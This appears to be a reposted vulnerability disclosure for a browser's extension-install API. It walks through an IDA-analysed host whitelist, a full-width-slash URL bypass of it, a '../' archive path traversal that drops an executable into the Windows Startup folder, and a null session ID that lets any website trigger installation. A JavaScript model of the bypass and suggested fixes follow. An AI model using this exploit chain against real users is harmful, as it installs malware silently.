Security Browser Remote Command Execution Vulnerability (malware can be planted by visiting any website)

Source: Internet
Author: User
Tags: types of extensions


Test environment: Windows 7 with the latest version of the browser at the time of testing (version screenshot not reproduced here).

The Security browser supports two types of extensions:

1. Chrome extensions, served from URLs like http://**.**/ext/xxx.crx; the user must confirm the installation.

2. Private applications, served from URLs like http://**.**/xxx/xx.zip; no confirmation is required.



Extensions are installed through a private browser API. The call looks like this:

External.appCmd(se6api.sid, 'seappmgr', 'installappitem', '{"downurl":"http://**.**.**.**/se6apps/ExtYouxi_**.**.**.**2.zip","appid":"ExtYouxi","appname":"game","appver":"**.**.**.**2","callbackFunc":"oninstalled"}', 'installcallback', function () {});



The second type is far more powerful: these packages routinely contain exe and dll files. For that reason the browser restricts them, and the file at downurl is downloaded and installed only when certain conditions are met.

What exactly are those conditions? Let's analyze.

Judging from the file names in the browser's directory, the extension functionality lives in seappmgr.dll. Load it into IDA, search for keywords such as InstallAppItem, downurl, safe and http://, and you arrive at the following function:


.text:5C004978 ; int __thiscall sub_5C004978(LPCWSTR lpszUrl)
.text:5C004978 sub_5C004978 proc near ; CODE XREF: sub_5C030882+15Ep
.text:5C004978 push ebx
.text:5C004979 push esi
.text:5C00497A mov esi, ecx
.text:5C00497C mov bl, 1
.text:5C00497E test esi, esi
.text:5C004980 jz short loc_5C0049D8
.text:5C004982 cmp word ptr [esi], 0
.text:5C004986 jz short loc_5C0049D8
.text:5C004988 mov edx, offset aDlsafecom ; **.**.**.**
.text:5C00498D call sub_5C0048C7
.text:5C004992 test al, al
.text:5C004994 jnz short loc_5C0049D8
.text:5C004996 mov edx, offset aDownsafec ; **.**.**.**
.text:5C00499B mov ecx, esi ; lpszUrl
.text:5C00499D call sub_5C0048C7
.text:5C0049A2 test al, al
.text:5C0049A4 jnz short loc_5C0049D8
.text:5C0049A6 mov edx, offset abaokucn ; **.**.**.**
.text:5C0049AB mov ecx, esi ; lpszUrl
.text:5C0049AD call sub_5C0048C7
.text:5C0049B2 test al, al
.text:5C0049B4 jnz short loc_5C0049D8
.text:5C0049B6 mov edx, offset aSeupdatesa ; **.**.**.**
.text:5C0049BB mov ecx, esi ; lpszUrl
.text:5C0049BD call sub_5C0048C7
.text:5C0049C2 test al, al
.text:5C0049C4 jnz short loc_5C0049D8
.text:5C0049C6 mov edx, offset aSeappupdate36 ; **.**.**.**
.text:5C0049CB mov ecx, esi ; lpszUrl
.text:5C0049CD call sub_5C0048C7
.text:5C0049D2 neg al
.text:5C0049D4 sbb al, al
.text:5C0049D6 and bl, al
.text:5C0049D8
.text:5C0049D8 loc_5C0049D8: ; CODE XREF: sub_5C004978+8j
.text:5C0049D8 ; sub_5C004978+Ej ...
.text:5C0049D8 pop esi
.text:5C0049D9 mov al, bl
.text:5C0049DB pop ebx
.text:5C0049DC retn
.text:5C0049DC sub_5C004978 endp



The structure is simple: the comparison helper (sub_5C0048C7 in the listing) is called once per hard-coded host string, the function returns 1 as soon as one comparison succeeds, and it returns 0 only when all five fail. It looks like a whitelist:

**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**



Further analysis shows that the host name is taken from downurl with InternetCrackUrlW rather than by matching the whole downurl against a regular expression. So how do we get past InternetCrackUrlW? If one of the whitelisted hosts offered a redirect to an arbitrary URL, that would work, though not elegantly; but the real problem lies elsewhere.

The **.**.**.** whitelist entry is a wildcard, i.e. it is matched as a domain suffix. Now write downurl as follows, where the slash directly after x.x.x.x is a wide-byte (full-width) slash rather than an ASCII one:

http://x.x.x.x/.**.**.**.**/ExtYouxi_**.**.**.**2.zip

Sure enough: InternetCrackUrlW does not treat the wide-byte slash as a delimiter, so the extracted host is x.x.x.x/.**.**.**.**, which ends in **.**.**.** and satisfies the policy; the browser's download code, on the other hand, treats the wide-byte / as an ordinary /, so the file is fetched from x.x.x.x. Perfect.
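To make the parser mismatch concrete, here is an added example in JavaScript; it is not code from the page or from the browser. It models the two parsers involved: a naive host extraction standing in for the InternetCrackUrlW-based check (which stops at the first ASCII slash and treats a full-width slash as part of the host), and an NFKC normalisation standing in for the download path that turns the full-width slash into an ordinary one. The whitelisted suffix .safe.example, the attacker address 203.0.113.10 and the file name ExtYouxi_2.zip are assumptions, since the real whitelist entries are masked on the page. It also shows a hardened check: accept printable ASCII only, parse once with a real URL parser, and compare the host exactly.

```javascript
// Added example, not code from the page or the browser. It models the parser mismatch
// described above: the policy check sees one host, the downloader fetches from another.
// Assumptions (not from the page): whitelisted wildcard suffix ".safe.example",
// attacker host 203.0.113.10, file name ExtYouxi_2.zip, and a download path that
// canonicalises the URL with NFKC (which maps U+FF0F FULLWIDTH SOLIDUS to "/").

const WIDE_SLASH = '\uFF0F';

// Wildcard entry as the page describes it: matched as a host suffix.
const SUFFIX_WHITELIST = ['.safe.example'];

// Stand-in for the InternetCrackUrlW-based host extraction: drop the scheme and read
// up to the first ASCII "/". A full-width slash is just another host character here.
function naiveHost(url) {
  const withoutScheme = url.replace(/^[a-z][a-z0-9+.-]*:\/\//i, '');
  return withoutScheme.split('/')[0].toLowerCase();
}

function suffixWhitelisted(host) {
  return SUFFIX_WHITELIST.some((suffix) => host.endsWith(suffix));
}

// The decision the vulnerable code makes: suffix check on the un-normalised host.
function vulnerableAllows(downurl) {
  return suffixWhitelisted(naiveHost(downurl));
}

// Where the request actually goes once the wide slash has become an ASCII slash.
function effectiveHost(downurl) {
  return naiveHost(downurl.normalize('NFKC'));
}

// Hardened decision: printable ASCII only, one real URL parse, exact host match,
// no wildcard rule. Rejecting just U+FF0F would leave every other look-alike in play.
const EXACT_HOSTS = new Set(['dl.safe.example', 'down.safe.example']);

function hardenedAllows(downurl) {
  if (!/^[\x21-\x7e]+$/.test(downurl)) return false;
  let parsed;
  try {
    parsed = new URL(downurl);
  } catch {
    return false;
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return false;
  return EXACT_HOSTS.has(parsed.hostname);
}

// Constructed inputs: the crafted downurl has the shape the page describes.
const CRAFTED = `http://203.0.113.10${WIDE_SLASH}.safe.example/ExtYouxi_2.zip`;
const LEGIT = 'http://dl.safe.example/se6apps/ExtYouxi_2.zip';

console.log('policy sees host :', naiveHost(CRAFTED));
console.log('vulnerable allows:', vulnerableAllows(CRAFTED));   // true
console.log('fetched from     :', effectiveHost(CRAFTED));      // 203.0.113.10
console.log('hardened allows  :', hardenedAllows(CRAFTED));     // false
console.log('hardened (legit) :', hardenedAllows(LEGIT));       // true
```

The point of the hardened version is not the ASCII filter on its own but that the policy and the download now agree on one parse of the URL; stripping a single wide-byte character closes this one path and leaves the underlying two-parser problem in place.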

Host ExtYouxi_**.**.**.**2.zip on your own server and test: the plug-in installs silently. Next, replace ExtYouxi_**.**.**.**2.zip with a malicious archive to get command execution.

Repeated tests showed that as soon as additional executable files (dll, exe and the like) are added to ExtYouxi_**.**.**.**2.zip, the installation fails. Are the files inside the archive signature-checked? However, when the archive contains a file whose name includes ../, the plug-in still installs, and that file is written to a directory of our choosing. You can guess what comes next.

Yes: we drop an exe into the Windows Startup folder.

After installation the plug-in lives in:

C:\Users\User\AppData\Roaming\apps\bin\se\<plug-in name>



We put a file named /../Microsoft/Windows/Start Menu/Programs/Startup/funny.exe into the archive. After installing the plug-in with the code above, funny.exe lands neatly in:

C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\



From here, the normal route would be to find an XSS in a privileged domain and use it to inject the malicious installation code. That is what I assumed at first; I did find an XSS and wrote the attack code (which is really simple).

But then I noticed that with se6api.sid set to null, the installation code runs successfully from any domain.

Unbelievable, but there it is!!!

Demo video: http://**.**/v_show/id_xmtq1mde0mdu1mg1_0000.html (haidianwooyun)

Solution:

1. The simplest fix is to filter out the wide-byte slash.

2. Allow privileged APIs to be called only from privileged domains.

